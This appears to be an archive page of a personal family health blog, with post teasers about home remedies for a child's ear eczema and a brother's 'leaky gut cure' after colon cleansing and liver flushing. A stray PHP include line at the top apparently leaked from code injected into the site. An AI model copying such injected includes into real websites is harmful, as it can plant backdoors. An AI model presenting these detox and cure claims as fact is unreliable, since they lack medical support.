@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); September 2007 - Page 6 of 6 - My Family Health Blog

Month: September 2007

Wife and I fight over calendula salve use on son’s ear eczema

My 4 year old boy suddenly grew a painful eczema under his left hear.  It is being treated.  But a careless nanny suddenly yanked his t-shirt up and caused him excruciating pain. My wife of course wanted to clean it with boiled guava leaves tea, which is excellent.  Then...

PepZin GI Leaky Gut Cure for my brother has arrived!

My brother Bugoy texted me this morning asking when the PepZin GI will be arriving.  I said anytime this week, then asked him why? Bugoy says he feels that with the success of his colon cleansing, liver flushing, and virgin coconut oil detox, he feels that the final clincher...